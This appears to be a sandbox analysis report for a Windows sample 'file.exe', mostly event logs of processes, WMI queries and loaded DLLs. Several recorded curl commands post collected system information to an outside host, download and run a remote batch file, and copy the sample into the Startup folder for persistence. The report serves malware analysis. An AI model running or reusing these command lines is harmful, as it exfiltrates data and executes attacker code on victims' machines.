Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4408:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5512:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2668:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4024:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3836:120:WilError_03

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\tmp.txt

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\AppData\Local\Temp\tmp.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Windows\SysWOW64\curl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Windows\SysWOW64\curl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Windows\SysWOW64\curl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Windows\SysWOW64\curl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Windows\SysWOW64\curl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: windows.storage.dll	Jump to behavior
